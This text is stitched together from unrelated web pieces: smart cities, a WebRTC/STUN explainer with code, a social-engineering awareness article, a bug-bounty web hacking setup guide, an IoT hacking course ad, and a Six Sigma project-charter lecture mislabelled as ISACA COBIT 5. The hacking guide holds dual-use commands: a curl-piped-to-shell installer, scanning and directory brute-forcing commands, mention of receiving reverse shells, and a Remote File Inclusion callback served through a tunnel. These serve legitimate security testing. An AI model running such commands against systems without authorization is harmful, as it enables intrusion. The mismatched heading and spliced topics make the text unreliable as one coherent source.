concretized foundation and some hi-tech amenities but also will challenge providing a significant option for maintenance or earning and by implementing better facilities for relocation. Experts are pondering over the questions as to what will be there in a Smart City. Or what they will gain through a Smart city? Well, the answers lie in higher efficiency and optimization of the support and assistance in a comprehensive approach. The aim is to achieve a greater “quality of life,” a distinguished rank in the HDI Human Development Index. Urban dwelling in Smart cities should mean the usual cost-effective way for a citizen to gain all sorts of services at the highest attainable performance. A proper system and process shall drive the complete town and its services with insignificant discretionary authorities for decision. At the same time, the method should be able to exterminate the limitations which most citizens face today by maximizing the coveted factors which include better living standards, and excellent services, alongside minimizing undesired items. For instance, Mumbai Health Authority will be capable of getting data in their IMS (Incident Management system), ready with the command and administration Centre of Mumbai Police. In case of a crisis when a heart patient is calling assuming he is suffering an attack, through the smart resolutions the hospital will be able to point the specific patient area which will be arranged on a GIS map automatically so that speedy aid /ambulance can visit him in shorter than 5-15 minutes. But the question remains as to how these Smart cities will be constructed, and what will be the technology used? The Smart Cities will incorporate the utilization of data and communication technology, as well as reliable energy technologies, for the more effective management of municipal services or E-governance assistance which can be from government to governments or government to citizens. 
Building a smart city combines work across several areas: energy management (for instance, smart grids), water management and storage, urban mobility through intelligent transport, unified healthcare, smart education, and public protection and security, to name a few.
WebRTC burst onto the scene in 2011 and generated a huge buzz. Everyone talked about how revolutionary it would be, how it was “going to explode,” and “change everything!” But a lot of the stuff I read didn’t explain how that was going to happen, or what WebRTC actually is. Now that it’s being implemented widely, I’ve noticed more discussion about it. Still, this discussion did little to provide clarity for users that weren’t developers. In today’s blog post I’m going to decode and explain WebRTC. What is it? WebRTC stands for Web Real Time Communications. Essentially, WebRTC is an API that allows users to make and receive voice and video calls through a web browser. This initiative is supported by Google, Mozilla, and Opera. Their joint mission statement, as quoted from their website is “To enable, rich, high-quality RTC applications to be developed for the browser, mobile platforms and IoT devices, and allow them all to communicate via a common set of protocols.” Like any revolutionary technology, there are a lot of challenges as well as benefits. How does it work? Without getting too technical and simply put, think of a voice or video call using WebRTC in terms of steps. - Call is initiated by Side A - Call needs to pass through Side A’s Firewall and NAT - Call needs to find the person being called (Side B) - Signal needs to pass through Side B’s Firewall and NAT - Now the voice and video need to travel in both directions, in real time. Essentially, there is a lot going on and a lot of pieces that need to work together. A WebRTC call is basically like getting from point “a” to point” b” by crawling under barbed wire and over a wall during a hail storm. The internet isn’t perfect. No one owns it, therefore there are few guarantees and not a lot that can be done to control the quality of service. This is what made WebRTC such a challenge. Thanks to STUN, TURN, and ICE your WebRTC call will get through the hail storm and then some. Session Traversal Utilities for NAT (STUN) helps find a host’s (caller or call recipient) IP address when it is behind a NAT/Firewall. When an incoming call comes it, STUN provides the public IP address, if this does not pass through then the Traversal Using Relay around NAT (TURN) comes in and establishes the connection. ICE simply refers to the standard that coordinates STUN and TURN. What makes it great? WebRTC is implemented using an API, so naturally this makes it easy to plug in regardless of web browser, operating system, or device. The API is also free and open source, so nothing needs to be created from scratch-saving developer’s time. However, it still requires a high-level of expertise and understanding to implement. Feature-wise WebRTC has a lot to offer: one-click calling, encryption of voice and video (with SRTP). You can also hear everyone more clearly thanks to excellent noise cancellation. IPVideoTalk: How Grandstream is making WebRTC work for you WebRTC is a fascinating, convenient technology that makes meeting and connecting easier than ever. Grandstream Networks created IPVideoTalk, a video, audio, and web conferencing service allowing users to join from anywhere. Any meeting hosted on a GVC (video conferencing hardware system) can be turned into an online meeting that can be joined in one-click from a WebRTC capable browser. Have a GVC and want to check it out? Start a free trial today! Sign up here.
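To make STUN a little less abstract, here is a minimal sketch (in Python rather than browser JavaScript) that sends a STUN Binding Request and decodes the XOR-MAPPED-ADDRESS attribute, revealing the public IP and port your NAT has assigned, which is the first hurdle a WebRTC call has to clear. The public STUN server address is just a commonly used example; treat the code as illustrative, not production-ready.

```python
import os
import socket
import struct

MAGIC_COOKIE = 0x2112A442  # fixed value from RFC 5389

def stun_public_address(server=("stun.l.google.com", 19302), timeout=3.0):
    """Send a STUN Binding Request and return the reflexive (public) IP and port."""
    txn_id = os.urandom(12)
    # Header: type=0x0001 (Binding Request), length=0, magic cookie, transaction ID.
    request = struct.pack("!HHI", 0x0001, 0, MAGIC_COOKIE) + txn_id

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(request, server)
        data, _ = sock.recvfrom(2048)
    finally:
        sock.close()

    msg_type, msg_len, _cookie = struct.unpack("!HHI", data[:8])
    if msg_type != 0x0101 or data[8:20] != txn_id:   # 0x0101 = Binding Success Response
        raise RuntimeError("unexpected STUN response")

    # Walk the attributes looking for XOR-MAPPED-ADDRESS (0x0020).
    offset = 20
    while offset < 20 + msg_len:
        attr_type, attr_len = struct.unpack("!HH", data[offset:offset + 4])
        value = data[offset + 4:offset + 4 + attr_len]
        if attr_type == 0x0020:
            _family, xport = struct.unpack("!xBH", value[:4])
            port = xport ^ (MAGIC_COOKIE >> 16)
            raw_ip = struct.unpack("!I", value[4:8])[0] ^ MAGIC_COOKIE
            return socket.inet_ntoa(struct.pack("!I", raw_ip)), port
        offset += 4 + ((attr_len + 3) // 4) * 4   # attributes are padded to 4 bytes
    raise RuntimeError("no XOR-MAPPED-ADDRESS in response")

if __name__ == "__main__":
    print(stun_public_address())
```

If STUN alone cannot establish a working path (for example, behind symmetric NAT), ICE falls back to relaying the media through a TURN server instead.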
Although the word “social engineering” might not sound very hazardous, this sort of attack is wrecking chaos in all the exploits it comes across. The basic difference between this cyber threat and others is that the execution is based on humans rather than an unpatched system vulnerability. But what exactly is a Social Engineering attack, and how can we avoid becoming a target? What is Human Hacking/Social Engineering attack? What are its impacts? Social Engineering is a technique that exploits humans using psychological manipulation and getting access to privileged information. It is also known as “Human Hacking.” They manipulate the users by showing a sense of urgency and fear of similar emotions leading the victim to leak the information to the attacker via call, email, or clicking on a link. First, the attacker gathers information on the victim using passive information gathering, dumpster diving, shoulder surfing, or others. Then, the attacker impersonates to gain confidence and gives urgent instructions for the subsequent steps. Then, the attacker exploits the victim by sabotaging or stealing some information or money. And after this, the last step is removing the traces and disengaging from the victim. The traces are hard to find as they use different tools and try to avoid logs as much as possible. In this attack, the victim is not a machine, but a human and is the weakest link due to emotions, lack of knowledge of personal data, and pressure. Read on to find out the types of these attacks and how you can prevent them from happening. What are the various Social Engineering attacks? Social Engineering is a broad term and has many different attacks within it, as mentioned: It attempts to access privileged information such as passwords, card details, PINs, and Personal Identification details like Driving Licence, Social Security Numbers, Passport Details, and others. It mainly involves the user clicking on links to malicious websites, replicas of original websites, or opening any attachments containing malware. It involves the attacker making a false promise to the victim to lure them into a trap. It can involve the attacker in sharing the user’s details for a “Free” offer. Vishing attacks involve the attacker connecting with the victim on a voice call and showing a sense of urgency to share details on a call. It is the same as vishing, but the method or the targeted attack medium is SMS instead of a voice call. An attacker can send you an SMS with some suspicious offer or a link that shows the urgency to share your details to access your private information. How can you detect Social Engineering attacks? Detection of Social Engineering Attacks is also essential, so you should always be attentive to what information you share with anyone. Here are a few quick tips that you can follow to detect such human attacks. - Whenever you are giving any information, make sure that the sender is legitimate and check the email address/phone of the concerned. - If a friend asks for the information, then always try to give them a call to confirm the need. - If you are visiting a website, check the URL and spelling errors. You can even check how the website reacts if you give false credentials. - If there is an offer, then always consider whether it is too good to be true, whether the links are suspicious, if the message has a sense of urgency, and so. Suggested Reading: 4 Tips How To Stay Safe Against Ransomware How can you avoid Social Engineering attacks? 
Social engineering is now commonplace, so knowledge of these attacks should be shared with everyone. Habits that help include:
- Get proper security education; awareness is the first step toward prevention.
- Always use multi-factor authentication.
- Always use strong passwords.
- Change passwords periodically.
- Be cautious with online-only friendships.
- Don't share your Wi-Fi credentials with everyone.
- Use a reputable antivirus; many now use machine learning to help detect social engineering attacks.
- Verify an employee's details with their company before sharing any information.
- Check periodically whether your accounts appear in data breaches, so you can change the credentials of the affected account and of any accounts using similar passwords.
It's time to fight the Human Hacks
Because social engineering targets people rather than systems, it is harder to tackle than most other threats. Use these strategies to help defend yourself and your organization against this human hack. If you want to go deeper into your industry's security posture, ACE offers free consultations that give you a detailed overview of your IT systems' weaknesses. It's time for us to take this cyberthreat seriously and take proactive steps to combat it.
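Several of the detection tips above (check the sender's domain, inspect links, watch for urgency) can be partly automated. The sketch below scores an email with a few naive heuristics; the keyword list, look-alike-domain check, and suggested threshold are illustrative assumptions, not a substitute for user awareness or a real email security gateway.

```python
import re

URGENCY_WORDS = {"urgent", "immediately", "verify", "suspended", "act now", "password"}
TRUSTED_DOMAINS = {"example.com"}   # domains your organization expects mail from

def looks_like(domain: str, trusted: str) -> bool:
    """Same length and at most one character differs (e.g. examp1e.com vs example.com)."""
    return (len(domain) == len(trusted) and domain != trusted
            and sum(a != b for a, b in zip(domain, trusted)) <= 1)

def phishing_score(sender: str, subject: str, body: str, links: list[str]) -> int:
    """Return a rough risk score; higher means more suspicious."""
    score = 0
    sender_domain = sender.rsplit("@", 1)[-1].lower()
    if sender_domain not in TRUSTED_DOMAINS:
        score += 1
    if any(looks_like(sender_domain, d) for d in TRUSTED_DOMAINS):
        score += 2   # look-alike of a trusted domain is a strong signal
    text = f"{subject} {body}".lower()
    score += sum(1 for word in URGENCY_WORDS if word in text)
    for link in links:
        host = re.sub(r"^https?://", "", link).split("/")[0].lower()
        if re.fullmatch(r"(\d{1,3}\.){3}\d{1,3}", host):   # link points to a raw IP address
            score += 2
        if host not in TRUSTED_DOMAINS:
            score += 1
    return score

score = phishing_score(
    sender="it-support@examp1e.com",
    subject="URGENT: verify your password immediately",
    body="Your account will be suspended. Act now.",
    links=["http://203.0.113.10/login"],
)
print(score, "-> treat anything above roughly 4 as suspicious")
```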
Web hacking is the most common type of security testing in pentests and bug bounty programs. Getting started can be really daunting, and having a solid environment set up with tools that cover many different areas of web hacking helps. A Note on Operating System (OS) / Distros One of the first things people get caught up on when they start hacking is "which distro should I use?" Most, if not all, hacking tools work on any Linux / Unix operating system and are written in high-level, cross-platform languages like Python, Java, Golang, and Ruby, which will work on any OS. For the purpose of this article, using a Debian-based Linux distribution such as Kali, Ubuntu, or ParrotOS will make the setup more convenient; otherwise, don't get caught up on distro choice, just get started with whatever is most convenient for you. It won't make much of a difference as long as you start hacking. For security purposes, you may wish to set up a Virtual Machine (VM) for web hacking locally. A VM will ensure that your host machine remains secure, and you can replicate your hacking environment easily by cloning a VM. You can follow the Kali Linux setup documentation for VirtualBox, VMWare, and UTM (on Mac) for VM setup. Local vs. Cloud environments Your hacking environment can be set up locally, or in the cloud using a VPS (Virtual Private Server). A VPS is a server that you rent in the cloud, with any OS you want, root access, and very fast internet speed. You should run some tools locally for faster interactivity, such as those with a GUI that you often interact with; others, such as scanning and enumeration tools, might be faster on a VPS (since the data centers they sit in have much faster internet), so that you can leave them running overnight or days on end in something like a tmux window. Having a VPS also means you have a reachable server on the internet to receive callbacks such as reverse shells and out-of-band HTTP and DNS requests. Setting up a VPS is not expensive; you can rent one for about $10 per month. We recommend a hybrid approach where you have all of the tools available in a local VM, with a VPS server available to install and run tools anytime. At the end of the day, methodology, skill, and experience matter more than the tooling. This article tries to introduce tools that would be useful to different hacking methodologies and introduce you to ways of finding bugs that have good coverage. When you're just starting out, tools guide you and teach you; but as you get more comfortable with hacking, you will be the one customizing and guiding the tools to achieve creativity in your own testing. This article won't go too deep into the advanced usage of each tool, but just enough to get you started. The hacking environment can also include extra resources that aren't so much hacking tools but help you manage tasks, keep track of notes, and give you ideas when you're stuck, such as note-taking apps, methodology handbooks, and payload cheatsheets. Those "soft resources'' can make all the difference to keep you going. Note-taking and Text Editors Good note-taking is essential for tracking progress when hacking a web application. One of the most popular ways to take notes while hacking is to use markdown note-taking apps, which provide a simple syntax for highlighting, and denoting code snippets and TODO items. There are many popular markdown-based note-taking apps, such as Obsidian, Notable, and Joplin. 
Pick one that works for you and stick with it - jumping around could be distracting and lead to data loss. Heynote is a different kind of note app that's more of a "scratch pad" with one continuous buffer with syntax highlighting; you can add new snippets to it and use it as a space to store and edit payloads. Having pen, paper, and sticky notes around the desk can also help those that are more inclined to physical note taking and drawing mind maps. Handbooks And Cheatsheets There will always be times when you are testing a web app, and you get stuck, run out of ideas, or don't know what to do next. That's why there are some handy resources that you should keep locally as a reference guide. Simply download the PDFs, copy them into the Documents folder for safekeeping, and add the URLs into your bookmarks: Web Request Interceptors Let's get into the "hard" tools themselves. A way to inspect, intercept, and manipulate HTTP requests with a proxy is essential to web hacking. The three most popular tools for web request interception are Burp Suite, Caido, and OWASP ZAP; the de facto is usually Burp. Good news - when new hackers reach at least a 500 reputation on HackerOne and have a positive signal, they are eligible for 3 months free of Burp Suite Professional. Setting Up Burp If you're using Kali, Burp Suite Community version is already installed by default. If it isn't, you can install it by running: apt update; apt install burpsuite (run any "apt" related commands as root by adding "sudo" in front of it or by having a root shell) On other systems, I recommend downloading Burp from PortSwigger's official website to get the latest version. On Linux, it will download as a .sh file that you can run to install it. Once it's installed, open up Burp, fire up a new project, and go to the "Target" tab; there, you will find an "Open browser" button that already has the proxy configured to forward traffic to Burp. Now you can start browsing to target websites and seeing the traffic come in! You may also wish to go into Burp -> Settings and search for the word "dark," then enable dark mode in the display settings: Setting Up Burp Extensions: Autorize There's a large number of extensions available in Burp built by the community. Portswigger even has a blog on the best Burp extensions. Here we will cover how to set up Autorize, one of the best extensions that helps you find authentication (authn) and authorization (authz) related vulnerabilities such as IDORs and broken access control bugs. Go to the Extensions tab, and then open the BApp Store. Here you will find a list of extensions available to be installed. Search "autorize", and click on the entry. Since Autorize is an extension written in Python, you will need to download Jython and configure Burp to use it in order to run Python extensions. Click on "Download Jython" and download the standalone version. Now you must configure Burp to use the Jython jar file we downloaded. Go into Burp -> Settings again, and search Jython. In the Extensions area, we can choose "Select file" next to "Location of Jython standalone JAR file" and choose the file we just downloaded. Now close the settings, go back to the Extensions tab, and click on Autorize again. This time you should be able to click the "Install" button: After installing, there should be a new Autorize tab at the top. Go there and click on "Autorize is off" to toggle it on. 
When you browse to any authenticated or unauthenticated pages, Autorize will now send a separate unauthenticated request to test for a bypass: For example, some of the graphql requests on HackerOne allow querying without authentication and therefore show up as "Bypassed" on Autorize. Others show as enforced, for example, a request to view the user's own profile will return a different response when unauthenticated. There are many more awesome Burp extensions that you can install — have a look at this larger list. Recon & Discovery Good recon is half the win; therefore, we outline different areas of tooling setup for each basic type of reconnaissance for web hacking. Note that tooling is constantly evolving, and this is not an exhaustive list by any means; it's just to get you started. For the purpose of this guide, we are skipping the usual asset discovery tools (such as subdomain enumeration and port scanning) to focus on web applications; for an introduction to asset discovery, you can read this blog from HackerOne. For service and content discovery tools that run on the command line, you may wish to spin up a small VPS (Virtual Private Server) in the cloud for running those scans since it would return results a lot faster, especially if you are scanning horizontally across a lot of targets. When you start testing a web app, you want to get a good feel of what kind of technology stacks it's built on. One way to do this in the browser is via a tool called Wappalyzer, which passively analyzes the website as you browse to detect technologies in use. You can use the extension for Firefox here or the Chrome webstore. For example, Wappalyzer just detected that hackerone.com is using Drupal 10 and MariaDB. Service and Vulnerabilities To further discover what might be running on a web app and what known vulnerabilities it may have, a powerful scanner like nuclei is essential for your hacking environment. You can install nuclei by running: apt install nuclei You should run Nuclei at least once initially (just invoke on the shell with nuclei) so that it can install and update nuclei-templates, which are scanning modules written by ProjectDiscover and the wider community. It includes a wide range of scans to detect various technologies, extracting version numbers, finding exposed admin panels, and scanning for known CVEs. This is how you can run nuclei to scan for known web-based CVEs: nuclei -target https://example.com -t http/cves/ Or run a workflow specifically targeting Drupal websites using a workflow: nuclei -target https://example.com -w workflows/drupal-workflow.yaml The two popular techniques of content discovery are spidering and directory brute forcing, and we'll get tools to do both of those things. It's written in Go, like a lot of fast hacking tools. Let's set up Go in our environment so that we can install Go-based tools quickly in the future. First, run apt install golang -y on your terminal. Then open your ~/.bashrc file in a text editor and add the following lines: export GOROOT=/usr/lib/go | Now reload .bashrc by running source ~/.bashrc This will configure your PATH variable so that your shell can find golang tools installed on your system. You can now install gospider via the go install command: GO111MODULE=on go install github.com/jaeles-project/gospider@latest For effective directory brute forcing, you need good wordlists. 
On Kali, there are a number of preinstalled wordlists in /usr/share/wordlists; however, better word lists, such as ones from wordlists.assetnote.io and the SecLists collection can be used. Wordlists from AssetNote are generated based on categories and use cases. Having a self-maintained ~/wordlists directory is a good idea, as you can use it to store all of your own wordlists separate from what Kali has (and you can download AssetNote wordlists based on the target and your needs) mkdir ~/wordlists; cd ~/wordlists git clone --depth=1 https://github.com/danielmiessler/SecLists wget https://wordlists-cdn.assetnote.io/data/automated/httparchive_subdomains_2024_01_28.txt | This is how to use feroxbuster with the wordlists downloaded from AssetNote: feroxbuster --url https://example.com --wordlist ~/wordlists/httparchive_apiroutes_2024_01_28.txt Generating custom wordlists based on each web application helps with discovering hidden paths that default wordlists don't contain. Now that we've set up golang, we can install golang tools easily, such as cook, which is an advanced wordlist generation tool: go install -v github.com/glitchedgitz/cook/v2/cmd/cook@latest Cook can be used during testing when interesting keywords and patterns and found to generate wordlists with a combination of words, separators, and file extensions: Static Analysis Tools An often overlooked area for web application testing is static analysis of source code. Both client-side and server-side source code can reveal interesting things about the web application that dynamic testing simply does not cover. This includes exposed secrets in source code such as API tokens and passwords, dangerous function calls that lead to XSS, template injection, or unsafe deserialization bugs. Semgrep can be easily installed as a Python3 pip module: pip3 install semgrep You can then use semgrep's publicly available rulesets (ci and owasp-top-ten) to scan a code base, and go through its findings: semgrep -c p/ci -c p/owasp-top-ten . Trufflehog can detect secrets in a variety of places, including source code, S3 buckets, git repositories, and so on. Furthermore, it has built-in verification capabilities that can verify if a secret is valid or not by hitting the service API (for example, getting the username from a leaked GitHub token or ARN from an AWS key). Trufflehog has its own installation script that you can run (or you can manually download it from releases): curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin | To scan a file with trufflehog, simply download the script and run trufflehog. wget https://example.com/scripts/example.js | Sometimes you might get lucky and come across web applications that have binaries available (such as DLL or JAR files) or have a docker image on Docker Hub that contains those files. In those cases, you may need decompilers. The two most common languages that web applications use that are also usually compiled are Java and C#. To install those languages on your Kali, you can run: apt install mono-complete default-jdk To decompile Java, you may want to download these decompilers and keep their JAR files handy for later: You can run JD-GUI like this:: java -jar ~/Downloads/jd-gui-*.jar Out-of-band Testing Tools For some vulnerabilities, such as Blind XSS, XML External Entity injection, and Remote File Inclusion, you may need a URL that's internet-exposed to receive the callback payload. 
For general DNS or HTTP callbacks, you can use interactsh, which will provide a random endpoint you can include in payloads. When it receives an interaction, it will provide the full HTTP and DNS request, including all headers and source IP addresses. Another tool you can use for XSS callbacks that require signup is bxsshunter. It allows you to create and generate callback links as well as automatically generate payloads for testing. An open-source, self-hosted alternative is xsshunter, but that requires hosting on a cloud Virtual Private Server (VPS) and a registered domain name, so we're leaving it as an exercise to the reader. Sometimes you might need to expose a web server with some files for the web application target to download or interact with, such as for testing Remote File Inclusion (RFI). In that case, having a reverse tunnel from localhost to the internet can allow you to quickly set up a callback for any arbitrary web service. You can download cloudflared from its GitHub releases for this purpose. For example, you may wish to host a PHP file for the target web application to include and run. On one terminal, create the file and start a Python web server on port 8000:
echo '<?php phpinfo(); ?>' > info.php
python3 -m http.server 8000
On another terminal, spin up a Cloudflare tunnel:
cloudflared tunnel --url http://localhost:8000
Now you can use your fresh Cloudflare URL to access the info.php file. There's a lot covered here, but don't fret; setting up a good environment for web hacking isn't meant to be a quick job. It takes effort, persistence, and time for you, the hacker, to get used to your environment as much as it gets more suited to your skills and style. It's a two-way symbiosis: as you grow into your tools, your tools grow with you; all you have to do is start and not stop.
Intro to IoT Hacking with Rick Wisser and Dave Fletcher As we move further and further into the age of the Internet of Things (IoT) we are increasingly surrounded by devices that collect, analyze, and share information about the world around us. IoT devices are currently being developed and deployed to optimize processes, analyze natural phenomenon, diagnose and treat medical conditions, automate mundane tasks, and create additional conveniences for the human race. Some of these devices simply over share information that we may consider private. Others may be subverted to pose a threat to society or personal safety. The crowd-funding and maker movements have also spawned a new class of non-traditional hardware development revenue streams. This rapid prototyping and rush to market environment is excellent for innovation. However, initial offerings may be completely void of security features. In the hardware world, lack of security features can be very difficult, if not impossible, to overcome. Once a device makes it into the hands of consumers, it may remain in service with latent vulnerabilities for a very long period of time. Typical consumers also lack the ability to distinguish between secure and insecure alternatives existing in the market. In many cases, the deciding factor driving purchase is device cost. As a result, the security community must begin to understand and develop test methodologies for these types of devices so vulnerabilities can be discovered and communicated in the same responsible nature that occurs in the general computing world. This course will serve as an introduction to IoT hacking, where we look at familiar devices and lay the groundwork for hardware security analysis. In this two-day training class, the following course outline will be covered along with the opportunity to hack on several different IoT devices. - Types of Hardware - Types of tooling - Applications of different tool Attack Surface Analysis - Identifying the Attack Surfaces for specific devices - Types of Attack Surfaces - How to dump firmware from a device - Use of tools to acquire and analyze firmware - Analysis of information collected from the device (code, firmware, etc.) - Analysis while interacting with the device (webpage, SSH, Bluetooth, etc.) Other Pentesting Disciplines - How do they relate to IoT hacking - Several labs that demonstrate other attack vectors which were not demonstrated during class - Lots of hands-on learning Wild West Hackin’ Fest (Oct 8th – Oct 9th, 2024) – Deadwood, SD - October 9th – 8:30 AM to 5:00 PM MDT - October 8th – 8:30 AM to 5:00 PM MDT Wild West Hackin’ Fest at Mile High (Feb 4th – Feb 5th, 2025) – Denver, CO - February 4th – 8:30 AM to 5:00 PM MDT - February 5th – 8:30 AM to 5:00 PM MDT - At least 60GB of free hard drive space - Minimum of 8GB of RAM - X86 processor-based PC - VMWare installed - PDF reader for Slides - NOTE: VMs will not run on ARM based PCs. This class is available for training at both WWHF Deadwood 2024 and WWHF Mile High 2025. For more information about our conferences, visit Wild West Hackin’ Fest!
ISACA COBIT 5 – Define (BOK IV) Part 5 11. Project Charter – Writing Project Scope (BOK IV.B.3) So far in project charter we have talked about business case, we have talked about problem statement. Now coming to the project scope, what is the scope of the project? So here we have the project charter, we have already already talked about business case, we have already talked about the problem statement. Now here we are on the project scope. So if you look here it’s looking at the start point, end point, what is the starting and the end point of the process and it is looking at what is in scope and what is out of scope. So these elements go as a part of project scope. Let’s look at these in more details on next few slides. So coming to project scope, the scope of the project need to be of just the right size. And when I say just the right size, what does that mean? That means is the scope of the project shouldn’t be too big, neither it should be too small. And when I say too big you don’t want a project of solving word hunger problem, word hunger issue. You don’t want to have that sort of a big project which you can never solve, neither you want to have a project which is too small, too small, that which doesn’t require the effort for Six Sigma methodology. Smaller projects you could have just done using seven basic quality tools or any other simple technique rather than going through the full methodology of Six Sigma process. So get the right size of the project and what is the right size of the project? Right size of the project is something which you can complete in two to three months. That’s the optimum size of a Six Sigma project. And when I talk about the scope there is depth and there is width of the scope. So coming to the depth of the scope so depth of the scope is, let’s say you have a process which has step number one, step number two, step number three, step number four in plain thing step number one could be placing an order for subsuppliers, getting the material. Step number two checking the material. Step number three production is step number four. Assembly is step number five and dispatch is step number six. So this is vertical. So here you need to make sure that what is the vertical scope of your project? Are you looking at the full chain from placing the order to subcontractor to dispatch or you are just limiting your project to the production group only or to the receipt inspection only. So that’s a vertical scope when it comes to the horizontal or the width of the scope, that means what is the width of the scope means, how much wide it is, is it related to one particular location or is it global covering all the countries? Let’s say a company has ten different production units in ten countries. Is the scope limited to one specific country or one specific location or is it related to all the ten locations. So that is the width of the project. So you need to check that what is the width and what is the depth of the scope which you want to take in your six sigma. And again, going back to the same thing, you don’t want a project which is too big. Probably you might want to do this project only on the one facility, on a one production unit. And once you have done that, then probably you might want to convey the result of that to other units. And same thing with the vertical as well. 
You might not want to do the project starting from placing order with the subsplier, then starting with the receipt inspection and starting with the manufacturing assembly, you don’t want to have all these steps included into the project, you might just want to limit yourself to the production. So this is how you look at the scope of the project and once you see that your scope is too big and you want to cut down on the scope, then probably you might want to do pareto analysis. So if you are taking an example of weld defects, rather than going through ten different location, ten different facilities, you might just want to take one facility or you might want to take one or two facilities which leads to the most of defects, 80% of the defects. So places where there are more problem, you might just want to include those facilities only in your project. And as we have seen on the template for the project charter, you need to have the starting point and the ending point. So starting point and the ending point could be anything like starting from the receipt in the production shop to the completion of the piece production. So something like that you need to put what is the starting point in the process and what is the ending point in the process which is included in the scope and you need to define what is in the scope and what is not in the scope or what is out of the scope. So in our example of welding, you might want to say that welding at the weld shop is only included in the scope of this project. Any welding done outside this shop which might be in the assembly or somewhere else that is not included. This is just an example to say that which area is included and which area is not included. When we talk of project scope, there is a particular item in project management terminology which is scope creep. So scope creep is something which means that your scope, if it is not fixed, if it is not finalized, will go on increasing because people will be putting more and more ideas and thoughts and your scope could never finish. In the project management, this is a common term which is scope creep. You might want to avoid scope creep. In your six sigma project, where your scope keeps on increasing, you started with one unit, and then you end up doing this project in ten units. You don’t want to do that because that way your project will never finish. So you might want to note down this term, which is scope creep. So with this, we finish our discussion on project scope definition. And this was the third item in the project. 12. Project Charter – SMART Goals and Objectives (BOK IV.B.4) So in the project charter so far we have talked about business case, problem statement and scope. So these are the elements which we have talked so far. Now, coming to goals and objectives, let’s look at that. So, as you see here on Project charter, we have talked about number one, we have talked about number two, which is problem statement number three, which is project scope. And here we want to put our goals and objectives for the Six Sigma project. So let’s understand what does this mean and how do we write that and what do we write here in goal statement? So the goal statement basically tells what is the goal of this Six Sigma project? One thing that need to be very clear, that this goal of the Six Sigma project need to be aligned with the problem statement, because the problem which you are solving is your goal. So your goal and the problem statement should align. 
Earlier, when we talked about the problem statement, our problem statement was that in our welding shop the average weld repair rate for the last three months has been 4.5%, as against the maximum target of 1%, and this is adding to the cost and delaying production. That was our problem statement. But then what is our goal? Our goal is to reduce that weld repair rate from 4.5%, where it has been for the last three months, to 0.5% – even lower than the 1% which was the norm earlier. Since we are doing a Six Sigma project, we want to reduce that rate even further. And we have put here the date of end of December 2016, so we have a target date as well. So our goal for this Six Sigma project is to reduce the weld repair rate from 4.5% to 0.5% by the end of December 2016.

Let's look at a few things here. When you are writing a goal statement, the first thing is that it needs to focus on numbers – where you are and where you want to be. That should be the focus of the goal statement. The goal statement generally starts with a verb, with an action. Here the action is to reduce; that's what you will be doing. You are putting the goal statement in the form of an action, in the form of a verb. And then your goal statement should have a target date as well, because if there is no target date, the goal doesn't mean anything. So, a few things in regard to the goal statement: put emphasis on numbers, start with a verb, and put a completion date. Another thing is that this goal needs to be a SMART goal. What is a SMART goal? Let's see that on the next slide.

When we say that goals or objectives need to be SMART, SMART means S for Specific, M for Measurable, A for Achievable, R for Relevant and T for Time-bound. Your goal should fulfil these five factors. If we look at the goal statement which we produced for our sample project – to reduce the weld repair rate from 4.5% to 0.5% by the end of December 2016 – this is a very concise, precise statement of the goal. It is specific: where we are and where we want to go. It is measurable, because you can measure the weld repair rate. It is achievable, because your earlier target was 1%, so it is not an unachievable goal; it is a tough goal, but still achievable, and that is the whole purpose of Six Sigma – you don't want a very easy goal for a Six Sigma project. It is relevant, because earlier we said that this problem is losing the organization $300,000 every year, so it is relevant to the organization's purpose. And it is time-bound, because we have put a deadline of December 2016 to complete this project. So that's a SMART goal, and that completes our discussion on goals and objectives, or the goal statement, in the project charter.

13. Project Charter – Project Performance Measurements (BOK IV.B.5)

So in our discussion of the project charter we have talked about the business case, the problem statement, the project scope, and goals and objectives. Now we are looking at project performance measures: how do we measure the performance of the project? Looking at the project charter, we have completed items one, two, three and four. Here we are on project performance measures, and we are looking at expected savings and benefits. What is the saving, what is the benefit of doing this project? What sort of benefits can you get from a Six Sigma project?
Let's look at those on the next slide. When you are doing a Six Sigma project, you can have monetary benefits or non-monetary benefits from it. Whatever you have, at the end of the day it is always better to convert everything into monetary terms, because that is what is going to convince management to go ahead with the project. Let's look at some examples of monetary benefits which you can achieve from a Six Sigma project. One could be increasing sales and revenue: if there is a way to increase sales or revenue, that makes a good Six Sigma project. Reducing cost is another, and in the example of the weld repair rate that is what we were talking about – reducing cost by reducing defects and rework. Another benefit could be avoiding cost. You can avoid cost by not buying a machine, by managing with existing resources, or by managing with existing people rather than hiring new people for a new shop. So your Six Sigma project could be focused on avoiding additional cost or additional investment – doing something with the existing machinery rather than buying another one. Similar to avoiding cost is cycle time reduction: making something faster. If you make something faster, you can make more units per day, and if you make more units per day you will increase your sales and your revenue, which will lead to an increase in profits. Reducing inventory is another: inventory is your money locked up. If you reduce inventory, that money gets freed, so you have more cash to work with, more cash to produce more items. That could be another focus for a Six Sigma project. Non-monetary benefits could be better customer satisfaction, client satisfaction, or reputation. So these are some of the terms on which the performance of your Six Sigma project can be measured, and that is what you put in the performance measures. In our sample project, we could say that by doing this project we will be saving $300,000 per year by not repairing and not retesting those weld joints which are creating problems, additional cost and delay in the work process.
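To show how an "expected savings" figure like this might be built up, here is a small illustrative calculation. It is only a sketch: the annual weld count and cost-per-repair figures below are assumptions invented for the example (chosen so the result lines up with the $300,000 quoted above), not data from the course; the repair rates are the 4.5% baseline and 0.5% target from the sample goal statement.

```python
# Hypothetical inputs -- replace with your own shop's actual data.
welds_per_year = 50_000    # assumed annual number of weld joints
cost_per_repair = 150.0    # assumed cost per repaired joint (labour, re-test, delay), in $

baseline_rate = 0.045      # 4.5% repair rate from the problem statement
target_rate = 0.005        # 0.5% target from the goal statement

baseline_repairs = welds_per_year * baseline_rate
target_repairs = welds_per_year * target_rate
repairs_avoided = baseline_repairs - target_repairs

annual_savings = repairs_avoided * cost_per_repair
print(f"Repairs avoided per year: {repairs_avoided:.0f}")
print(f"Expected annual savings:  ${annual_savings:,.0f}")
```

With these assumed inputs the script prints 2,000 avoided repairs and roughly $300,000 per year; a real charter would plug in the shop's actual weld volumes and repair costs and state them explicitly as the basis for the savings claim.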
<urn:uuid:dbf034b6-807f-40fd-8d61-f81574df9ea6>
CC-MAIN-2024-38
https://www.examcollection.com/blog/isaca-cobit-5-define-bok-iv-part-5/
